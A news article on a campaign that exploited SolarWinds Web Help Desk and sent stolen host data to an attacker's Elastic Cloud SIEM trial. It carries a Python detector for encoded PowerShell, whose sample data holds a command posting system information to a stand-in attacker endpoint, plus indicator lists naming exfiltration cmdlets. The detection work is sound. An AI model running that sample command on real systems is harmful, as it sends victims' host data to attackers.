CyberSecurity SEE

Threat Actor Exploits Vulnerabilities and Utilizes Elastic Cloud SIEM for Managing Stolen Data

Cybersecurity Researchers Uncover Extensive Data Theft Campaign

Cybersecurity researchers have recently revealed a sophisticated campaign that exploits multiple software vulnerabilities, allowing threat actors to steal sensitive system data and store it within a cloud-based security platform. The alarming findings, disclosed by the cybersecurity firm Huntress, detail how attackers manipulated a free-trial instance of Elastic Cloud’s security information and event management (SIEM) platform to collect and analyze data from compromised systems spanning dozens of organizations.

The investigation unveiled that the threat actor employed a novel approach by avoiding the traditional command-and-control (C2) infrastructure typically used in such attacks. Instead, the stolen victim data was exfiltrated directly into an Elastic Cloud instance under the attacker’s control. This tactic effectively turned a legitimate security monitoring tool into a means of accumulating and storing stolen information, showcasing an unsettling use of existing technology for malicious purposes.

Leveraging Enterprise Software Vulnerabilities

Huntress researchers observed that the attackers were exploiting vulnerabilities in widely used enterprise software, most notably SolarWinds Web Help Desk. By running an encoded PowerShell command on the compromised systems, the attackers gathered detailed host information, including operating system details, hardware specifications, Active Directory data, and installed patches. This data was then transmitted to an Elasticsearch index named "systeminfo."

This innovative strategy allowed the attackers to triage their victims and prioritize targets with the help of SIEM tools, which are intended for defensive security monitoring. By leveraging these tools, the threat actor was able to operate under the radar, making it more challenging for organizations to detect suspicious activities.
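As an added illustration (not code from Huntress or from the article), the following Python scans Windows process-creation log lines for an encoded PowerShell command that combines the three behaviours described above: a host survey, an HTTP send, and a write to an Elasticsearch index. The log lines, the decoded payload, the endpoint and the indicator lists are constructed assumptions; only the index name "systeminfo" comes from the article.

```python
import base64
import re
# Indicators of the behaviour described above: host survey, HTTP send, Elasticsearch index write.
SURVEY_CMDLETS = ("Get-ComputerInfo", "Get-HotFix", "Get-ADComputer", "Get-CimInstance")
HTTP_SENDERS = ("Invoke-RestMethod", "Invoke-WebRequest", "Net.WebClient")
ES_WRITE = re.compile(r"/(?P<index>[a-z0-9_.-]+)/(?:_doc|_create|_bulk)\b", re.I)
# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...).
ENC_ARG = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/]{16,}={0,2})", re.I)

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if the line carries none."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    try:  # PowerShell base64-encodes the UTF-16LE bytes of the script
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def classify(script):
    """Report which of the three behaviours a decoded script shows."""
    lowered = script.lower()
    hits = {"survey": [c for c in SURVEY_CMDLETS if c.lower() in lowered],
            "sender": [s for s in HTTP_SENDERS if s.lower() in lowered],
            "es_index": [m.group("index") for m in ES_WRITE.finditer(script)]}
    hits["suspicious"] = bool(hits["survey"] and hits["sender"] and hits["es_index"])
    return hits

def scan_lines(lines):
    """Return a finding for every log line whose encoded command shows all three behaviours."""
    findings = []
    for line in lines:
        script = decode_encoded_command(line)
        hits = classify(script) if script is not None else {"suspicious": False}
        if hits["suspicious"]:
            findings.append({"line": line, "script": script, **hits})
    return findings

def _enc(ps):  # builds the constructed samples the way powershell.exe expects them
    return base64.b64encode(ps.encode("utf-16-le")).decode()

# Constructed sample log lines (not the real payload or endpoint): one lookalike, two benign.
SAMPLE_PAYLOAD = ("Get-ComputerInfo | ConvertTo-Json | Invoke-RestMethod -Method Post "
                  "-Uri https://ATTACKER-ENDPOINT.invalid/systeminfo/_doc")
SAMPLE_LOGS = [
    "EventID=4688 CommandLine=powershell.exe -NoP -W Hidden -enc " + _enc(SAMPLE_PAYLOAD),
    "EventID=4688 CommandLine=powershell.exe -ExecutionPolicy Bypass -EncodedCommand " + _enc("Get-Service"),
    "EventID=4688 CommandLine=cmd.exe /c whoami",
]
```

Requiring all three behaviours together keeps ordinary encoded administrative scripts out of the findings; the decoded script is returned so an analyst can read the actual destination rather than only the base64 blob.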

Elastic Cloud Deployment and Malicious Interactions

The Elastic Cloud instance utilized in this campaign was created on January 28, 2026, and remained active for several days. During this time, telemetry data indicated that the operator engaged extensively with the environment through the Kibana interface, executing hundreds of actions while examining the incoming victim data. This engagement demonstrates not only the attacker’s commitment to data collection but also their technical prowess in navigating legitimate security platforms.

Further analysis revealed that the trial account utilized a disposable email address connected to the domain quieresmail.com. Investigators deduced that the email format is associated with a Russian-registered temporary email network, firstmail.ltd, which operates multiple throwaway domains. This added another layer of sophistication to the attack, as it obscured the identities of the perpetrators.

Moreover, evidence suggested that the attacker consistently reused random eight-character identifiers across various components of their infrastructure, including both email registrations and subdomains that hosted tools on Cloudflare worker pages. Notably, administrative logins to the SIEM instance were traced back to IP addresses believed to have originated from a SAFING VPN privacy network tunnel, further complicating identification efforts.

Scope of the Campaign

Data retrieved from the attacker’s Elastic environment revealed that at least 216 hosts across 34 Active Directory domains had been compromised during this extensive campaign. A majority of the affected machines were servers, with the Windows Server 2019 and 2022 versions being the most common targets. The victims were not limited to a single sector; they spanned a wide array of organizations including:

Some hostnames pointed to the possibility that the attacker was also exploiting vulnerabilities in additional enterprise platforms, including Microsoft SharePoint, underscoring the extensive reach of this campaign.

Collaborative Response to Cyber Threats

In response to the threat, researchers coordinated with Elastic and law enforcement agencies to alert affected organizations and take further investigative measures. The cloud instance that was exploited in the attack has since been taken offline, a step taken to mitigate further risks in the wake of the discovery.

In their blog post, Huntress stated, "We have performed outreach and victim notification to organizations that we believe were indicated within the uncovered data, and we have coordinated with Elastic in a collaborative effort to further investigate and take down this threat actor infrastructure." This proactive approach highlights the importance of community cooperation in addressing cybersecurity challenges and protecting sensitive information from being misappropriated in technology-driven environments.

The revelations serve as a stark reminder of the vulnerabilities in enterprise software and the lengths to which cybercriminals will go to exploit these weaknesses, underlining the critical need for robust cybersecurity measures and vigilant monitoring practices across all sectors.
